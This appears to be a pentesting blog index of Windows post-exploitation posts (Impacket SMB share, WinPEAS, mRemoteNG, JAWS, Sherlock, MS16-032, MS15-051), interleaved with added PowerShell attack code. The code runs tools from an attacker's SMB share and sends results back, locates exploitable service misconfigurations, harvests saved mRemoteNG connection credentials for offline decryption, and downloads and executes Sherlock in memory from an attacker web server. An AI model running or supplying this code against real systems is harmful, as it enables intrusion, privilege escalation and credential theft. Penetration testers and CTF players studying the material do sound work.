SMB server with Impacket-smbserver

This time we will set up an SMB server with impacket-smbserver (https://github.com/SecureAuthCorp/impacket) and run scripts directly from it.
Download
1. Download the scripts
git clone https://github.com/SecureAuthCorp/impacket.git
2. Locate the smbserver script
find . -iname *smbserver* 2> /dev/null
Note: I already have it installed on my Kali machine.
How to
1. In your Linux Read more…
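The Windows half of that procedure, as an added example (this is not code from the post): the attacker side is assumed to be `impacket-smbserver share /tmp/share -smb2support -username smbuser -password smbpass` listening on 10.10.14.5; the IP, share name, credentials and tool name are assumptions. The tool is executed over the UNC path, so nothing is copied to the target's disk, and its output is written back to the share so it lands in /tmp/share on the attacker box.

```powershell
# Added example, not code from the post: run a tool straight from an Impacket SMB share.
# Attacker side (assumed): impacket-smbserver share /tmp/share -smb2support -username smbuser -password smbpass
# The IP, share name, credentials and tool name below are assumptions.
$AttackerIP = '10.10.14.5'
$Share      = "\\$AttackerIP\share"
$Tool       = 'winPEASany.exe'

# Map with credentials: current Windows builds refuse guest/unauthenticated SMB2 access, and
# -smb2support on the server side is needed because SMB1 is disabled on the client by default.
net use $Share /user:smbuser smbpass | Out-Null
if ($LASTEXITCODE -ne 0) { throw "net use failed for $Share" }

try {
    if (-not (Test-Path -LiteralPath "$Share\$Tool")) { throw "$Tool is not on the share" }

    # Run from the UNC path so nothing is written to the target's disk; send the output back to
    # the share so it ends up in /tmp/share on the attacker machine.
    $report = "$Share\$env:COMPUTERNAME-$($Tool -replace '\.exe$', '').txt"
    & "$Share\$Tool" 2>&1 | Out-File -FilePath $report -Encoding utf8
    "Report written to $report"
}
finally {
    # Drop the mapping so the attacker credentials do not linger in the session.
    net use $Share /delete /y | Out-Null
}
```

If the mapping fails with a guest-access error, the server was started without `-username`/`-password`: recent Windows clients block unauthenticated SMB2 shares by default, so always start smbserver with credentials.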

WinPEAS – Windows Enum

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. This post covers how to run it and how to complete post-exploitation activities with its output.
How to
1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
cd privilege-escalation-awesome-scripts-suite
2. Navigate through the directories to find the binary Read more…
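Three of the checks winPEAS automates (unquoted service paths, AlwaysInstallElevated, and service binaries writable by the current user), reproduced by hand as an added example so a finding from the report can be verified on the host without dropping the binary. This is not winPEAS code; it assumes Windows PowerShell 3 or later for Get-CimInstance.

```powershell
# Added example (not winPEAS code): three of the checks winPEAS automates, written by hand.

function Get-UnquotedServicePath {
    # An unquoted path containing spaces makes the service controller try C:\Program.exe,
    # then "C:\Program Files\Vendor.exe", ... before the real binary. \Windows\ paths are excluded as noise.
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $p = $_.PathName
        $p -and $p -notmatch '^\s*"' -and $p -notmatch '^[A-Za-z]:\\Windows\\' -and (($p -split '\.exe')[0] -match '\s')
    } | Select-Object Name, StartName, StartMode, PathName
}

function Get-AlwaysInstallElevated {
    # Only dangerous when BOTH the machine and the user policy value are 1: msiexec then installs as SYSTEM.
    $state = @{}
    foreach ($hive in 'HKLM', 'HKCU') {
        $v = Get-ItemProperty -Path "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" `
                              -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($v) { [int]$v.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $state['HKLM']
        HKCU        = $state['HKCU']
        Exploitable = ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
    }
}

function Get-WritableServiceBinary {
    # Service binaries the current token may modify: overwrite the file, restart the service (or wait
    # for a reboot) and the payload runs as the service account. ACL-based, so stopped services count too.
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        # First token of the command line is the binary, quoted or not (an unquoted path with spaces
        # will be cut at the first space, which is exactly the case Get-UnquotedServicePath reports).
        $exe = if ($svc.PathName -match '^\s*"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split '\s+')[0] }
        if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }

        $acl = Get-Acl -LiteralPath $exe
        $hit = foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # Generic rights show up numerically and are not matched here; named rights are enough for a triage.
            if ($ace.FileSystemRights -notmatch 'Write|Modify|FullControl') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
            catch { continue }
            if ($sids -contains $sid) { $ace }
        }
        if ($hit) {
            [pscustomobject]@{
                Service = $svc.Name
                Binary  = $exe
                RunsAs  = $svc.StartName
                Rights  = (($hit | ForEach-Object { $_.FileSystemRights }) -join ', ')
            }
        }
    }
}

'== Unquoted service paths ==';    Get-UnquotedServicePath   | Format-Table -AutoSize
'== AlwaysInstallElevated ==';     Get-AlwaysInstallElevated
'== Writable service binaries =='; Get-WritableServiceBinary | Format-Table -AutoSize
```

An unquoted path is only exploitable if one of the intermediate directories (for example C:\ or C:\Program Files\Vendor) is writable by the current user and the service runs as a privileged account and can be restarted, so each hit still needs the StartName and directory ACL checked.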

Exploiting mRemoteNG

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, Read more…
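Because those saved settings are what makes the tool interesting after a foothold, here is an added example (not mRemoteNG's own code) that parses the default connections file and lists every saved connection with its username and the stored password value. The file location assumed is the default `%APPDATA%\mRemoteNG\confCons.xml`; the Password attribute is stored encrypted and is only enumerated here, not decrypted.

```powershell
# Added example (not mRemoteNG code): enumerate saved connections from confCons.xml.
# Assumes the default location under %APPDATA%; the Password attribute is left encrypted.
function Get-MRemoteNGConnections {
    param([string]$Path = (Join-Path $env:APPDATA 'mRemoteNG\confCons.xml'))

    if (-not (Test-Path -LiteralPath $Path)) { throw "confCons.xml not found at $Path" }
    [xml]$cfg = Get-Content -LiteralPath $Path -Raw

    # Each connection is a Node element whose settings are attributes; containers nest further Nodes,
    # so select every Node in the tree and keep only those that actually point at a host.
    $cfg.SelectNodes('//Node') | Where-Object { $_.Hostname } | ForEach-Object {
        [pscustomobject]@{
            Name        = $_.Name
            Protocol    = $_.Protocol
            Host        = $_.Hostname
            Port        = $_.Port
            Domain      = $_.Domain
            Username    = $_.Username
            EncPassword = $_.Password   # encrypted blob as stored on disk
        }
    }
}

Get-MRemoteNGConnections | Format-Table -AutoSize
```

Collect the whole file rather than just this table: the encryption parameters (and, in newer versions, the per-file protection settings) are attributes on the root element and are needed to recover the passwords offline.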

How to enumerate Windows using JAWS

JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0, so it 'should' run on every Windows version since Windows 7. https://github.com/411Hall/JAWS
How to
1. Download the script
git clone https://github.com/411Hall/JAWS.git
cd JAWS
ls
2. Read more…

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) - CVE-2016-0099

Microsoft Windows could allow a local authenticated attacker to gain elevated privileges on the system, caused by improper sanitization of handles in memory by the Secondary Logon Service. By executing a specially-crafted program, an authenticated attacker could exploit this vulnerability to execute arbitrary code as an administrator and take control Read more…

Sherlock – Find missing Windows patches for Local Privilege Escalation

Sherlock is a PowerShell script for privilege escalation that quickly finds missing patches on the system (https://github.com/rasta-mouse/Sherlock). It currently looks for:
MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
Read more…
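The run step that the JAWS entry above and this Sherlock entry both lead to, as one added example (not code from either project or from the posts): JAWS is run with its documented command line, Sherlock is loaded in memory from an attacker web server and its entry point Find-AllVulns is filtered down to what it reports as exploitable, and, since the MS16-032 entry above depends on the Secondary Logon service, that service's state is checked before anyone reaches for the exploit. The attacker address 10.10.14.5 (serving the .ps1 files, e.g. with `python3 -m http.server 80`) and the output file names are assumptions.

```powershell
# Added example (not JAWS or Sherlock code): run both enumeration scripts and triage the result.
# Assumptions: attacker at 10.10.14.5 hosting jaws-enum.ps1 and Sherlock.ps1 over HTTP.
$Attacker = 'http://10.10.14.5'

# Relax the execution policy for this process only; it is a default, not a security boundary.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force

# JAWS: the project's documented invocation, with the script assumed to be in the working directory.
# Its report goes to a file so it can be pulled back later.
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename "$env:COMPUTERNAME-jaws.txt"

# Sherlock: load in memory (nothing touches disk) and call its entry point.
Invoke-Expression ((New-Object System.Net.WebClient).DownloadString("$Attacker/Sherlock.ps1"))
$vulns = Find-AllVulns | Where-Object { $_.VulnStatus -eq 'Appears Vulnerable' }
$vulns | Format-Table Title, MSBulletin, CVEID, Link -AutoSize

# MS16-032 (CVE-2016-0099) abuses handles leaked by the Secondary Logon service, so the exploit
# only works while that service (seclogon) is running; confirm before wasting time on it.
if (@($vulns | ForEach-Object { $_.MSBulletin }) -contains 'MS16-032') {
    $seclogon = Get-Service -Name seclogon
    "Secondary Logon service is $($seclogon.Status); MS16-032 needs it Running"
}
```

Treat "Appears Vulnerable" as a lead, not a result: Sherlock decides from file versions, so a host that was patched by a later cumulative update can still be listed, and a missing KB does not mean the specific exploit works on that build.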

Windows Exploit MS15-051 – CVE-2015-1701 – Privilege Escalation

This exploit abuses a Windows kernel-mode driver (win32k.sys) vulnerability that leads to privilege escalation.
Vulnerable:
Microsoft Windows Vista Service Pack 2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003 Itanium SP2
Microsoft Read more…